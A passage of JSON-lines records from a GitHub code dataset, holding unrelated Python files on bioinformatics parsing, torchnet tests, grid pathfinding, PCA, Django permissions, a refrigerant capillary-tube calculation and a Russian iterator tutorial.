parser.parse_known_args()\n\n Args.aes_iv = args.aes_iv\n Args.aes_key = args.aes_key\n\n unittest.main(argv=[sys.argv[0]] + unittest_args)\n","repo_name":"consometers/sge-tiers-proxy","sub_path":"sgeproxy/test_streams.py","file_name":"test_streams.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"7769810331","text":"#!/usr/bin/env python\n\nimport re\nfrom pathlib import Path\n\ncog_onto = \"cog-20.def.tab\"\nfun_lookup = \"fun-20.tab\"\ncog_out = \"COG-onto_rel1.tsv\"\n\n#COG0001\tH\tGlutamate-1-semialdehyde aminotransferase\tHemL\tHeme biosynthesis\t\t2CFB\n#1. COG ID\n#2. COG functional category (could include multiple letters in the order of importance)\n#3. COG name\n#4. Gene associated with the COG (optional)\n#5. Functional pathway associated with the COG (optional)\n#6. PubMed ID, associated with the COG (multiple entries are semicolon-separated; optional)\n#7. PDB ID of the structure associated with the COG (multiple entries are semicolon-separated; optional)\n\n#H\tDCDCFC\tCoenzyme transport and metabolism\n#1. Functional category ID (one letter)\n#2. Hexadecimal RGB color associated with the functional category\n#3. Functional category description\n\n#L1\tL2\tL3\tID\tFunction\tEC\n#Metabolism\tCarbohydrate metabolism\tGlycolysis / Gluconeogenesis [PATH:ko00010]\tK00844\tHK; hexokinase\t2.7.1.1\n\n\nfun = Path(fun_lookup).read_text()\nwith open(cog_onto) as cog, open(cog_out, 'w') as writer:\n print('L1', 'L2', 'ID', 'Function', 'EC', sep='\\t', file=writer)\n for line in cog:\n COG_ID, FUN_CAT, NAME, GENE, PATHWAY, PUBMED, PDB_ID = line.strip('\\n').split('\\t')\n for c in FUN_CAT:\n COLOR,CAT = re.search(rf'{c}\\t(.*)\\t(.*)', fun).groups()\n print(CAT, NAME, COG_ID, f\"{GENE}; {PATHWAY}\", '', sep='\\t', file=writer)\n","repo_name":"raw-lab/MetaCerberus","sub_path":"src/COG/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"722846859","text":"import torchnet.transform as transform\nimport unittest\nimport torch\n\n\nclass TestTransforms(unittest.TestCase):\n def testCompose(self):\n self.assertEqual(transform.compose([lambda x: x + 1, lambda x: x + 2, lambda x: x / 2])(1), 2)\n\n def testTableMergeKeys(self):\n x = {\n 'sample1': {'input': 1, 'target': \"a\"},\n 'sample2': {'input': 2, 'target': \"b\", 'flag': \"hard\"}\n }\n\n y = transform.tablemergekeys()(x)\n\n self.assertEqual(y['input'], {'sample1': 1, 'sample2': 2})\n self.assertEqual(y['target'], {'sample1': \"a\", 'sample2': \"b\"})\n self.assertEqual(y['flag'], {'sample2': \"hard\"})\n\n def testTableApply(self):\n x = {1: 1, 2: 2}\n y = transform.tableapply(lambda x: x + 1)(x)\n self.assertEqual(y, {1: 2, 2: 3})\n\n def testMakeBatch(self):\n x = [\n {'input': torch.randn(4), 'target': \"a\"},\n {'input': torch.randn(4), 'target': \"b\"},\n ]\n y = transform.makebatch()(x)\n self.assertEqual(y['input'].size(), torch.Size([2, 4]))\n self.assertEqual(y['target'], [\"a\", \"b\"])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"alexsax/midlevel-reps","sub_path":"tnt/test/test_transforms.py","file_name":"test_transforms.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"33292611036","text":"import math\n\nclass Cell(object):\n def __init__(self, x, y, blocked=False):\n self.x = x\n self.y = y\n self.blocked = blocked\n\n def distance(self, other_cell):\n if (self.x == other_cell.x and self.y == other_cell.y):\n return 0\n if (self.x == other_cell.x):\n return 5 * abs(other_cell.y - self.y)\n if (self.y == other_cell.y):\n return 5 * abs(other_cell.x - self.x)\n return 5 * math.sqrt((other_cell.x - self.x)**2 + (other_cell.y - self.y)**2)\n\n def __str__(self):\n return f'({self.x}.{self.y})'\n\n def __descr__(self):\n return str(self)\n\nclass Wall(object):\n def __init__(self, x, y, horizontal):\n self.x = x\n self.y = y\n self.horizontal = horizontal\n\n def __str__(self):\n output = f'({self.x}.{self.y}.'\n if (self.horizontal):\n output += \"H)\"\n else:\n output += \"V)\"\n return output\n\n def __descr__(self):\n return str(self)\n\nclass CellList(object):\n def __init__(self, cl):\n self.cells = cl\n\n def __str__(self):\n output = \"\"\n first_cell = True\n for cell in self.cells:\n if (first_cell):\n output += str(cell)\n first_cell = False\n else:\n output += \", \" + str(cell)\n return output\n\n def __descr__(self):\n return str(self)\n\n\nclass Node(object):\n def __init__(self, cell, distance, cell_path):\n self.cell = cell\n self.distance = distance\n self.cell_path = cell_path\n self.processed = False\n\nclass Board(object):\n HORIZONTAL = True\n VERTICAL = False\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.cells = list()\n self.walls = list()\n for x in range(width):\n row = list()\n for y in range(height):\n row.append(Cell(x, y))\n self.cells.append(row)\n\n def get_cells_in_range(self, cell, range):\n cells_in_range = list()\n for row in self.cells:\n for c in row:\n if (c.distance(cell) <= range):\n cells_in_range.append(c)\n return CellList(cells_in_range)\n\n def add_wall(self, start_x, start_y, horizontal, length):\n for i in range(length):\n if (horizontal):\n self.walls.append(Wall(start_x + i, start_y, self.HORIZONTAL))\n else:\n self.walls.append(Wall(start_x, start_y + i, self.VERTICAL))\n\n def check_wall(self, another_wall):\n for wall in self.walls:\n if (wall.x == another_wall.x and wall.y == another_wall.y and wall.horizontal == another_wall.horizontal):\n return True\n return False\n\n def get_cells_reachable(self, cell, range, dist_acum, nodes, cell_path):\n if (dist_acum > range):\n #print(f\"get_cells_reachable: For cell {cell} dist_acum({dist_acum}) > range({range}) - return\")\n return\n\n if (str(cell) in nodes):\n #print(f'get_cells_reachable: Cell {str(cell)} already in nodes')\n node = nodes[str(cell)]\n if (node.distance > dist_acum):\n #print(f'get_cells_reachable: Better path for cell {str(cell)}')\n node.distance = dist_acum\n node.cell_path = cell_path\n node.processed = False\n else:\n node = Node(cell, dist_acum, cell_path)\n nodes[str(cell)] = node\n #print(f'get_cells_reachable: Cell {str(cell)} not in nodes. Adding it.')\n\n if (not node.processed):\n #print(f'get_cells_reachable: Prospecting cells adjacent to cell {cell}')\n interval = [-1, 0, 1]\n for dx in interval:\n for dy in interval:\n x = cell.x + dx\n y = cell.y + dy\n if (x >= 0 and y >= 0 and x < len(self.cells) and y < len(self.cells[0])):\n if (dx == 0):\n if (dy == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.HORIZONTAL))):\n continue\n elif (dy == 1):\n if (self.check_wall(Wall(cell.x, cell.y+dy, self.HORIZONTAL))):\n continue\n elif (dy == 0):\n if (dx == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.VERTICAL))):\n continue\n elif (dx == 1):\n if (self.check_wall(Wall(cell.x+dx, cell.y, self.VERTICAL))):\n continue\n else:\n if (dx == -1):\n if (dy == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.VERTICAL)) or self.check_wall(Wall(cell.x, cell.y, self.HORIZONTAL))):\n continue\n if (self.check_wall(Wall(cell.x, cell.y+dy, self.VERTICAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.HORIZONTAL))):\n continue\n if (dy == 1):\n if (self.check_wall(Wall(cell.x, cell.y, self.VERTICAL)) or self.check_wall(Wall(cell.x, cell.y+dy, self.HORIZONTAL))):\n continue\n if (self.check_wall(Wall(cell.x+dx, cell.y+dy, self.HORIZONTAL)) or self.check_wall(Wall(cell.x, cell.y+dy, self.VERTICAL))):\n continue\n if (dx == 1):\n if (dy == -1):\n if (self.check_wall(Wall(cell.x, cell.y, self.HORIZONTAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.VERTICAL))):\n continue\n if (self.check_wall(Wall(cell.x+dx, cell.y+dy, self.VERTICAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.HORIZONTAL))):\n continue\n if (dy == 1):\n if (self.check_wall(Wall(cell.x+dx, cell.y+dy, self.VERTICAL)) or self.check_wall(Wall(cell.x+dx, cell.y+dy, self.HORIZONTAL))):\n continue\n if (self.check_wall(Wall(cell.x, cell.y+dy, self.HORIZONTAL)) or self.check_wall(Wall(cell.x+dx, cell.y, self.VERTICAL))):\n continue\n\n c = self.cells[x][y]\n if (not c in cell_path and not c.blocked):\n dist = cell.distance(c)\n if (dist > 0):\n cp = cell_path + [c]\n #print(f'Prospecting cell {c}')\n self.get_cells_reachable(c, range, dist_acum + dist, nodes, cp)\n node.processed = True\n\n\nb = Board(10, 10)\nb.cells[6][2].blocked = True\nb.cells[7][2].blocked = True\nb.add_wall(2, 2, b.HORIZONTAL, 4)\nb.add_wall(2, 2, b.VERTICAL, 4)\nb.add_wall(6, 2, b.VERTICAL, 2)\nb.add_wall(2, 6, b.HORIZONTAL, 4)\nb.add_wall(6, 5, b.VERTICAL, 1)\nb.add_wall(8, 0, b.VERTICAL, 8)\nb.add_wall(0, 8, b.HORIZONTAL, 8)\n\nfor w in b.walls:\n print(w)\n\ncell = b.cells[2][2]\nrange = 400\ndist_acum = 0\nnodes = {}\ncell_path = [cell]\nb.get_cells_reachable(cell, range, dist_acum, nodes, cell_path)\n\nprint(f\"cells in range {range} from cell {str(cell)}:\")\nfor key, n in nodes.items():\n cp = \"\"\n for c in n.cell_path:\n cp += f'{str(c)} '\n print(f' Cell:{str(n.cell)} Dist:{n.distance:.2f} Path:{cp}')\n","repo_name":"AlexGP80/RPG","sub_path":"utils/euclidean2.py","file_name":"euclidean2.py","file_ext":"py","file_size_in_byte":7957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33819530854","text":"import os, sys\nfrom copy import copy\nfrom utils import Container, nl\n\n\nsizes = [\n (1, \"ant\", 0.01),\n (2, \"doorway\", 1),\n (3, \"baseball bat\", 1),\n (5, \"whale\", 10),\n (6, \"city block\", 100),\n (7, \"Eiffel tower\", 300),\n (8, \"English channel (narrowest)\", 35000),\n (9, \"AU (Earth to Sun)\", 1.5e11),\n (10, \"Light Year\", 9.5e15),\n\n (21, \"thickness of sunglasses\", 0.001),\n (22, \"Staphilococcus bacterium\", 1e-6),\n (23, \"Poliovirus\", 3e-8),\n (24, \"Hydrogen atom diameter\", 1e-10),\n (25, \"Hydrogen nucleus\", 2.4e-15),\n ]\n\nsizes = {s[0]: Container(name=s[1], size=s[2]) for s in sizes}\n\n\nclass Rescaler(object):\n tpl = \"%-28s %s\"\n msg = \"If %s was the size of %s\" + nl*2\n\n def rescale(self, i1, i2):\n i1, i2 = sizes[i1], sizes[i2]\n scaled = copy(sizes)\n ratio = i1.size / i2.size\n print(self.msg % (i1.name, i2.name))\n\n for item in scaled.values():\n item.size /= ratio\n print(self.tpl % (item.name, self.format(item.size)))\n\n def format(self, val):\n def fmt(val):\n plural = '' if val==1 else 's'\n return (\"%.2f\" % val).rstrip('0').rstrip('.'), plural\n\n if val < 1e-9:\n return \"less than a nanometer\"\n elif 1e-9 <= val < 1e-6:\n return \"%s nanometer%s\" % fmt(val * 1e9)\n elif 1e-6 <= val < .001:\n return \"%s micrometer%s\" % fmt(val * 1e6)\n elif .001 <= val < .01:\n return \"%s millimeter%s\" % fmt(val * 1000)\n elif .01 <= val < 1:\n return \"%s centimeter%s\" % fmt(val * 100)\n elif 1 <= val < 1000:\n return \"%s meter%s\" % fmt(val)\n elif val >= 1000:\n return \"%s kilometer%s\" % fmt(val / 1000)\n\n\n\nif __name__ == \"__main__\":\n try : Rescaler().rescale(5, 1)\n except KeyboardInterrupt : pass\n","repo_name":"pythonbyexample/PBE","sub_path":"chapter01/rescaler.py","file_name":"rescaler.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"11574610827","text":"import subprocess\n\nimport modal\n\nstub = modal.Stub(\"modal-arbitrary-code-example\")\n\n\n@stub.function(\n mounts=[\n modal.Mount.from_local_dir(\n local_path=\"./rust\",\n remote_path=\"/root/rust\",\n )\n ],\n)\ndef run_rs() -> None:\n subprocess.run([\"chmod\", \"+x\", \"/root/rust/bin/x86/app\"])\n subprocess.run([\"/root/rust/bin/x86/app\"])\n\n\n@stub.function(\n image=modal.Image.debian_slim().apt_install(\"ruby-full\"),\n mounts=[\n modal.Mount.from_local_dir(\n local_path=\"./ruby\",\n remote_path=\"/root/ruby\",\n )\n ],\n)\ndef run_rb() -> None:\n subprocess.run([\"chmod\", \"+x\", \"/root/ruby/app.rb\"])\n subprocess.run([\"ruby\", \"/root/ruby/app.rb\"])\n\n\n@stub.local_entrypoint\ndef main() -> None:\n \"\"\"Main entrypoint.\"\"\"\n run_rs.call()\n run_rb.call()\n","repo_name":"anthonycorletti/modal-arbitrary-code-example","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71737336748","text":"def head(L):\n return L[0]\n \ndef tail(L):\n return L[1]\n\ndef py2ll(L):\n if not L:\n return None\n else:\n return (L[0], py2ll(L[1:]))\n\ndef ll2py(L):\n if not L:\n return []\n else:\n H = head(L)\n T = tail(L)\n return [H] + ll2py(T)\n\ndef size(L):\n if not (L):\n return 0\n else:\n return 1 + size(tail(L))\n\ndef sorted(L):\n if not L:\n return True\n if not tail(L):\n return True\n else:\n C1 = head(L) <= head(tail(L))\n return C1 and sorted(tail(L))\n\ndef sum(L):\n if not (L):\n return 0\n if not tail(L):\n return head(L)\n else:\n return head(L) + sum(tail(L))\n\ndef split(L):\n if not L:\n return (None, None)\n if not tail(L):\n return (L, None)\n else:\n H0 = head(L)\n H1 = (head(tail(L)))\n (T0,T1) = split(tail(tail(L)))\n return ((H0, T0), (H1, T1))\n\ndef merge(L0, L1):\n if not L0:\n return L1\n if not L1:\n return L0\n else:\n H0 = head(L0)\n T0 = tail(L0)\n H1 = head(L1)\n T1 = tail(L1)\n if H0 < H1:\n return (H0, merge(T0, L1))\n else:\n return (H1, merge(L0, T1))\n\ndef mSort(L):\n if not(L):\n return None\n if not tail(L):\n return L\n else:\n (L0, L1) = split(L)\n return merge(mSort(L0), mSort(L1))\n\ndef max(L):\n maior = head(L)\n if not (L):\n return 0\n if not tail(L):\n return head(L)\n if maior <= head(tail(L)):\n return max(tail(L))\n if maior > head(tail(L)):\n retorno = maior, tail(tail(L))\n return max(retorno)\n else:\n return maior\n\ndef get(L, N):\n if not L:\n return None\n if N < 0:\n N = size(L) + N\n for _ in range(0, N):\n L = tail(L)\n return head(L)","repo_name":"LucasAzvd/Composicao-de-Programas-em-Python","sub_path":"Programação Funcional/atv_1.py","file_name":"atv_1.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70575902507","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport mglearn\n\nfrom sklearn.datasets import load_breast_cancer\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n# PCA 연산 과정 전시\nmglearn.plots.plot_pca_illustration()\nplt.show()\n\n####################################################################################################################################################\n### Dataset Preparation and Analysis ###############################################################################################################\n####################################################################################################################################################\n# 유방암 데이터셋 준비\ncancer = load_breast_cancer()\n\nfig, axes = plt.subplots(6, 5, figsize=(10, 20))\n\nmalignant = cancer.data[cancer.target == 0] # 악성으로 분류된 데이터 준비\nbenign = cancer.data[cancer.target == 1] # 양성으로 분류된 데이터 준비\n\n# 데이터셋의 각 Feature의 Historgram을 그림\nax = axes.ravel()\nfor i in range(30):\n _, bins = np.histogram(cancer.data[:, i], bins=50)\n ax[i].hist(malignant[:, i], bins=bins, color=mglearn.cm3(0), alpha=.5)\n ax[i].hist(benign[:, i], bins=bins, color=mglearn.cm3(2), alpha=.5)\n ax[i].set_title(cancer.feature_names[i], fontsize=10)\n ax[i].set_yticks(())\n ax[0].set_ylabel(\"Frequency\", fontsize=10)\n ax[0].legend([\"malignant\", \"benign\"], loc=\"best\")\n\nplt.subplots_adjust(left=0.05, right=0.95, top=0.95, bottom=0.05, hspace=0.5)\nplt.show()\n\n# 데이터셋 표준화\nscaler = StandardScaler() # Standard Scaler 준비\nscaler.fit(cancer.data) # 데이터셋에 대한 평균과 표준편차를 산출함\nX_scaled = scaler.transform(cancer.data) # 데이터셋을 표준화함\n\n####################################################################################################################################################\n### Principle Component Analysis of Breast Cancer Dataset ##########################################################################################\n####################################################################################################################################################\npca = PCA(n_components=2) # 2개의 최상 Principle Component를 생성하는 PCA 객체 준비\npca.fit(X_scaled) # 표준화된 데이터셋에 대해 PCA 수행\n\nX_pca = pca.transform(X_scaled) # Principle Component를 기반으로 데이터셋을 재구성함\n\nprint('Original shape : {}'.format(str(X_scaled.shape))) # 원본 데이터의 형태를 출력함\nprint('Reduced shape : {}'.format(str(X_pca.shape))) # PCA 기반으로 재구성된 데이터의 형태를 출력함\n\n####################################################################################################################################################\n### Result Plotting ################################################################################################################################\n####################################################################################################################################################\n\n# 재구성된 데이터셋을 그래프로 그림\nplt.figure(figsize=(8,8))\nmglearn.discrete_scatter(X_pca[:,0], X_pca[:,1],cancer.target)\nplt.legend([\"malignant\", \"benign\"], loc=\"best\")\nplt.gca().set_aspect(\"equal\")\nplt.xlabel(\"First principal component\")\nplt.ylabel(\"Second principal component\") \nplt.show() \n\nprint('PCA shape : ', pca.components_.shape) # Principle Component의 형태를 출력함\n\nprint('PCA components : ', pca.components_) # Principle Component를 출력함\n\n# Principle Component를 그래프로 그림\nplt.matshow(pca.components_, cmap='viridis')\nplt.yticks([0, 1], [\"First component\", \"Second component\"])\nplt.colorbar()\nplt.xticks(range(len(cancer.feature_names)), cancer.feature_names, rotation=60, ha='left')\nplt.xlabel(\"Feature\")\nplt.ylabel(\"Principal components\")\nplt.show()\n\n\n\n","repo_name":"luwis93choi/ML2020_Class","sub_path":"Assignment_07_Dimensionality_Reduction_PCA/KOR/02_1_BreastCancer_PCA_Principle_Component_Analysis.py","file_name":"02_1_BreastCancer_PCA_Principle_Component_Analysis.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44516114108","text":"from django.conf import settings\n\n\ndef init_permission(request,user):\n \"\"\"\n 权限和菜单信息的初始化,以后使用时,需要在登陆成功之后调用该方法将权限和菜单信息放入session\n :param request:\n :param user:\n :return:\n \"\"\"\n\n # 获取用户信息和权限写入session\n permission_quertset = user.userinfo.roles.filter(permissions__url__isnull=False).values('permissions__url',\n 'permissions__is_menu',\n 'permissions__title',\n 'permissions__icon', ).distinct()\n\n menu_list = []\n permission_list = []\n for row in permission_quertset:\n permission_list.append({'permissions__url': row['permissions__url']})\n if row['permissions__is_menu']:\n menu_list.append(\n {'title': row['permissions__title'], 'icon': row['permissions__icon'], 'url': row['permissions__url']})\n\n request.session[settings.PERMISSION_SESSION_KEY] = permission_list\n request.session[settings.MENU_SESSION_KEY] = menu_list","repo_name":"dengdeng-a/repo2","sub_path":"luffy_permission(示例三)/luffy_permission/rbac/service/init_permission.py","file_name":"init_permission.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24795581113","text":"#1. Input data: geometric and operating conditions.\n#2. Calculate the adiabatic mass flow rate (Eq. (9)) using hi,c as the enthalpy path\n#3. Based on the calculated mass mass flow rate, calculate:\n\t#a. Number of transfer units (Eq. (15));\n\t#b. Heat exchanger effectiveness (Eq. (12));\n\t#c. Suction line outlet temperature (Eq. (11));\n\t#d. Refrigerant enthalpy at the evaporator inlet (Eq. (10));\n\t#e. Average enthalpy (Eq. (17)).\n#4. Calculate the adiabatic mass flow rate (Eq. (9)) using the\n#refrigerant average enthalpy.\n#5. Calculate the K-multiplier (Eq. (16)) and correct the mass flow\n\nimport numpy as np\nimport CoolProp.CoolProp as cool\n\n\ndef izracun(t, hladivo, prt):\n\t\n\t# Podatki za 2. tocko algoritma:\n\tD_c\t= t[1]*10**(-3)\t# Premer kapilarne cevi\t\t\t[m]\n\tD_s\t= t[2]*10**(-3)\t# Premer sesalne cevi\t\t\t[m] \n\tp_c\t= t[3]*10**5\t# Tlak na inlet\t\t\t\t[Pa]\n\tp_e\t= t[4]*10**5\t# Tlak uplinjanja\t\t\t[Pa] \n\tdt_sub \t= t[5]\t\t# Podhlajenje\t\t\t\t[K] \n\n\tfi\t= 6.0\t\t# Kapilarna konstanta\t\t\t[/]\n\tL_c\t= 2.7\t\t# Dolzina kapilarne cevi\t\t[m]\n\tL_s\t= 1.5\t\t# Dolzina sesalne cevi\t\t\t[m]\n\t\n\n\t# Podatki za 3. tocko algoritma:\n\tt_s_i\t= 273.15 + t[7] # Temperatura na vstopu v sesalno cev\t[K] \n\n\tc\t= 4\t\t# Konstanta\t\t\t\t[/] \t\t\n\tn\t= 0.405\t\t# Konstanta\t\t\t\t[/] \t\t\n\t\n\n\t# Konstante za korekcijo masnega toka:\n\tc0 \t= 1.103\n\tc1\t= 0.3\n\tc2\t= -0.03\n\tc3\t= -0.450\n\tc4\t= -0.2\n\n\t\n\t\n\t\n\t#2. Calculate the adiabatic mass flow rate (Eq. (9)) using hi,c as the enthalpy path\n\t\n\t# Podatki za vstop v zanko - se spreminjajo vsako iteracijo\n\tt_sat \t= cool.PropsSI(\"T\", \"Q\", 0, \"P\", p_c, hladivo)\t\t\t# Temperatura nasicene tekocine na kondenzatorju \n\tt_c_i\t= t_sat - dt_sub\t\t\t\t\t\t# Temperatura na vstopu v kapilaro\n\th_c_i \t= cool.PropsSI(\"H\", \"T\", t_c_i, \"P\", p_c, hladivo)\t\t# Entalpija na vstopu v kapilaro\n\tt_s_o\t= t_s_i + 30\t\t\t\t\t\t\t# Začetni priblizek izstopne temperrature iz sesalne cevi\n\tp_i \t= p_c\t\t\t\t\t\t\t\t# Tlak na vhodu v kapilarno cev (enak tlaku kondenzacije) \n\th_avg \t= h_c_i\t\t\t\t\t\t\t\t# Prvotna definicija h_avg (to racunamo z zanko) \n\t\n\t\n\t# Definicija spremenljivk za izvedbo iteracije\n\tw \t= 3 / 3600\n\ti \t= 0\n\tK \t= 1\n\t\n\twhile(abs(K) > 1e-8 ): \n\t\ti = i+1\n\t\t\n\t\th_f \t= h_avg\t\t\t\t\t\t\t# Entalpiji na vstopu v kapilaro \n\t\tt_f \t= cool.PropsSI(\"T\", \"H\", h_f, \"P\", p_c, hladivo)\t# Temperatura na flash-point\n\t\tp_f\t= cool.PropsSI(\"P\", \"Q\", 0, \"T\", t_f, hladivo)\t\t# Tlak na flash-point\n\t\tv_f\t= 1 / (cool.PropsSI(\"D\", \"P\", p_f, \"Q\", 0, hladivo))\t# Specificni volumen na Flash-Point\n\t\teta_f\t= cool.PropsSI(\"V\", \"P\", p_f, \"Q\", 0, hladivo)\t\t# Viskoznost na flash-point\n\t\t\t\t\t\t\t\t\t\t\n\t\tk = 1.63e5 * p_f**(-0.72)\t\t\t\t\t#\n\t\ta = v_f * (1 - k)\t\t\t\t\t\t# Koeficienti\n\t\tb = v_f * p_f * k\t\t\t\t\t\t# \n\t\t\n\t\t# Izracun masnega toka:\n\t\tw_prev \t= w\t\n\t\tw = fi * np.sqrt((D_c**5 / L_c) * (((p_i - p_f) / v_f) + ((p_f - p_e) / a) + ((b / a**2) * np.log((a * p_e + b) / (a * p_f + b))))) \n\t\t\n\t\tt_s_avg = (t_s_i + t_s_o) / 2\t\t\t\t\t\t# Povprečna temperatura v sesalni cevi \t[K]\n\t\tlam_v \t= cool.PropsSI(\"L\", \"H\", h_avg, \"P\", p_e, hladivo)\t\t# Termična prevodnost-nasicena tekocina [W/mK] \t\t\n\t\teta_v \t= cool.PropsSI(\"V\", \"H\", h_avg, \"P\", p_e, hladivo)\t\t# Viskoznost-nasicena tekocina\t\t[Pa s]\n\t\tc_p_v \t= cool.PropsSI(\"C\", \"H\", h_avg, \"P\", p_e, hladivo)\t\t# Specifična toplota-nasicena tekocina\t[J/kgK] \n\t\tv_v\t= 1 / (cool.PropsSI(\"D\", \"H\", h_avg, \"P\", p_e, hladivo))\t# Specifični volumen-nasicena tekocina\t[m3/kg]\n\t\tc_p_s \t= cool.PropsSI(\"C\", \"P\", p_e, \"T\", t_s_avg, hladivo)\t\t# Specifična toplota v sesalni cevi\t[J/kgK]\n\t\t\n\t\t#3. Based on the calculated mass mass flow rate, calculate:\n\t\t\t#a. Number of transfer units (Eq. (15));\n\t\t\t#b. Heat exchanger effectiveness (Eq. (12));\n\t\t\t#c. Suction line outlet temperature (Eq. (11));\n\t\t\t#d. Refrigerant enthalpy at the evaporator inlet (Eq. (10));\n\t\t\t#e. Average enthalpy (Eq. (17)).\n\t\t\n\t\tNTU = (c * w**(n - 1) * L_s * lam_v**(2/3)) / (D_s**n * eta_v**(n - (1/3)) * c_p_v**(2/3))\t# Number of Transfer Units\n\t\teps = NTU / (1 + NTU)\t\t\t\t\t\t\t\t\t\t# Ucinkovitost prenosnika toplote\n\t\tt_s_o = t_s_i + eps * (t_c_i - t_s_i)\t\t\t\t\t\t\t\t# Temperatura na izstopu iz sesalne cevi\n\t\th_c_o = h_c_i - eps * c_p_s * (t_c_i - t_s_i) \t\t\t\t\t\t\t# Entalpija na izstopu iz kapilare\n\t\t\n\t\n\t\th_avg = 0.5 * (h_c_i + h_c_o) \n\t\tK = 1 - (w_prev / w)\n\n\n\n\n\n\t\tif(prt == 1): \n\t\t\tprint(\"Iteracija\", i) \n\t\t\tprint(\"Masni tok =\", w * 3600) \n\t\t\tprint(\"K_multiplier =\", K) \n\t\t\tprint(\"c_p_s\", c_p_s) \n\t\t\tprint(\"tlak\", p_f * 10**(-5))\n\t\t\tprint(\"v_f\", v_f)\n\t\t\tprint(\"razlika\", t_s_o - t_s_i) \n\t\t\tprint(\"eps\", eps) \n\t\t\tprint(\"tso\", t_s_o) \n\t\t\tprint(\"\\n\") \n\t\t\n\n\n\tw \t= c0 * (L_s / L_c)**(c1) * (D_s / D_c)**(c2) * eps**c3 * ((v_f * eta_f) / (v_v * eta_v))**(c4) * w\t\n\n\n\treturn np.array([i, t_s_o - 273.15, w * 3600, eps]) \n\n\n","repo_name":"zigaPerne/fs-projects","sub_path":"spoj-kapilarne-in-sesalne-cevi-koda/izracun.py","file_name":"izracun.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862300214","text":"# Design a data structure that will be initialized with a string array, and then it should answer queries of the shortest distance between two different strings from the array.\n\n# Implement the WordDistance class:\n\n# WordDistance(String[] wordsDict) initializes the object with the strings array wordsDict.\n# int shortest(String word1, String word2) returns the shortest distance between word1 and word2 in the array wordsDict.\n\nclass WordDistance:\n\n def __init__(self, wordsDict: List[str]):\n self.words = wordsDict\n self.pos = defaultdict(list)\n for index,word in enumerate(wordsDict):\n self.pos[word].append(index)\n\n def shortest(self, word1: str, word2: str) -> int:\n m = float('inf')\n for idx1 in self.pos[word1]:\n for idx2 in self.pos[word2]:\n m = min(m,abs(idx1 - idx2))\n return m \n\n# Time complexity of initialization is O(N). Time complexity of shortest operation is O(n^2)\n\n# Space complexity is O(N)","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/HashTable/shortestWordDistance2.py","file_name":"shortestWordDistance2.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33007623966","text":"# class FishInventory:\n# def __init__(self, fishList):\n# self.available_fish = fishList\n\n# def __iter__(self):\n# self.index = 0\n# return self\n \n \n# def __next__(self):\n# if self.index < len(self.available_fish):\n# fish_status = self.available_fish[self.index]\n# self.index += 1\n# return fish_status\n# else: \n# raise StopIteration\n\n\n# fish_inventory_cls = FishInventory(['Bubbles', 'Finley', 'Moby'])\n# for fish in fish_inventory_cls:\n# print(fish)\n\n# ==============================\n# создайте для класс CustomerCounter методы iter и next, которые \n# возвращать число пользователей и остановиться, когда их число \n# превышает 100\n\n\n# class CustomerCounter:\n# def __init__(self, customerList):\n# self.customers = customerList\n\n# def __iter__(self):\n# self.count = 0\n# return self\n \n# def __next__(self):\n# if self.count > 99:\n# raise StopIteration\n# self.count += 1\n# return self.count\n\n \n# customer_cls = CustomerCounter(list(range(110)))\n# for customer in customer_cls:\n# print(customer)\n# ========================================================================\n\nfrom itertools import count, chain, combinations \n\n#count(start, [step])\nfor i in count(start = 0, step =2):\n # он принимает начало и шаг\n print(i)\n if i >= 20:\n break\n\nodd = [5,7,9]\neven = {10,12,14}\n# ==========================================\nall_numbers = chain(odd, even)\n# соединяет две переменные в список, сперва идёт первый список, потом второй\nfor num in all_numbers:\n print(num)\n\n# ===============================================\neven = [2,4,6]\neven_combinations = list(combinations(even, 2))\n # он принимает два аргумента: переменную �� кол-во комбинаций \n\nprint(even_combinations)\n# [(2, 4), (2, 6), (4, 6)]\n# combination = возвращает кол-во возможных комбинаций списка\n\n# collars = ['red-s', 'red-x', 'blue-xs', 'green-l', 'yellow-m']\n# collars_combo_iterator = combinations(collars, 3)\n\n# for collar in collars_combo_iterator:\n# print(collar)\n\n# ===========================================================\n\n# ФУНКЦИЯ ГЕНЕРАТОР\n\n\"\"\"Yield — это ключевое слово в Python, которое используется для возврата из функции с сохранением состояния ее локальных переменных,\nи при повторном вызове такой функции выполнение продолжается с оператора yield, на котором ее работа была прервана. \nЛюбая функция, содержащая 